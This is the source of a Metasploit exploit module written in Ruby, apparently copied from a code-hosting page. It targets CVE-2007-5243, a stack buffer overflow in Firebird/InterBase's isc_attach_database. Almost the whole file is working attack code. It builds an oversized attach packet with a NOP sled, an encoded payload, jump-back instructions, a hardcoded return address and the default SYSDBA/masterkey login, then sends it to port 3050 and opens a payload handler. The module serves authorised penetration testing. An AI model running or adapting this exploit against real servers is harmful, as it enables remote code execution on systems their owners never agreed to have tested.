Path: blob/master/modules/exploits/windows/misc/fb_isc_attach_database.rb
19849 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::BruteTargets1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow',16'Description' => %q{17This module exploits a stack buffer overflow in Borland InterBase18by sending a specially crafted create request.19},20'Author' => [21'Ramon de C Valle',22'Adriano Lima <adriano[at]risesecurity.org>',23],24'Arch' => ARCH_X86,25'Platform' => 'win',26'References' => [27[ 'CVE', '2007-5243' ],28[ 'OSVDB', '38607' ],29[ 'BID', '25917' ],30[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],31],32'Privileged' => true,33'License' => MSF_LICENSE,34'Payload' => {35'Space' => 512,36'BadChars' => "\x00\x2f\x3a\x40\x5c",37'StackAdjustment' => -3500,38},39'Targets' => [40[ 'Brute Force', {} ],41# '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'42[43'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',44{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }45],46# Debug47[48'Debug',49{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }50],51],52'DefaultTarget' => 1,53'DisclosureDate' => '2007-10-03',54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64Opt::RPORT(3050)65]66)67end6869# Create database parameter block70def dpb_create71isc_dpb_user_name = 2872isc_dpb_password = 297374isc_dpb_version1 = 17576user = 'SYSDBA'77pass = 'masterkey'7879dpb = ''8081dpb << [isc_dpb_version1].pack('c')8283dpb << [isc_dpb_user_name].pack('c')84dpb << [user.length].pack('c')85dpb << user8687dpb << [isc_dpb_password].pack('c')88dpb << [pass.length].pack('c')89dpb << pass9091dpb92end9394# Calculate buffer padding95def buf_padding(length = '')96remainder = length.remainder(4)97padding = 09899if remainder > 0100padding = (4 - remainder)101end102103padding104end105106def exploit_target(target)107target['Length'].each do |length|108connect109110# Attach database111op_attach = 19112113# Extra padding to trigger the exception114extra_padding = 1024 * 16115116buf = ''117118# Operation/packet type119buf << [op_attach].pack('N')120121# Id122buf << [0].pack('N')123124# Length125buf << [length + extra_padding].pack('N')126127# Nop block128buf << make_nops(length - payload.encoded.length - 13)129130# Payload131buf << payload.encoded132133# Jump back into the nop block134buf << "\xe9" + [-516].pack('V')135136# Jump back137buf << "\xeb" + [-7].pack('c')138139# Random alpha data140buf << rand_text_alpha(2)141142# Target143buf << [target.ret].pack('V')144145# Random alpha data146buf << rand_text_alpha(extra_padding)147148# Padding149buf << "\x00" * buf_padding(length + extra_padding)150151# Database parameter block152153# Create database parameter block154dpb = dpb_create155156# Database parameter block length157buf << [dpb.length].pack('N')158159# Database parameter block160buf << dpb161162# Padding163buf << "\x00" * buf_padding(dpb.length)164165sock.put(buf)166167select(nil, nil, nil, 4)168169handler170end171end172end173174175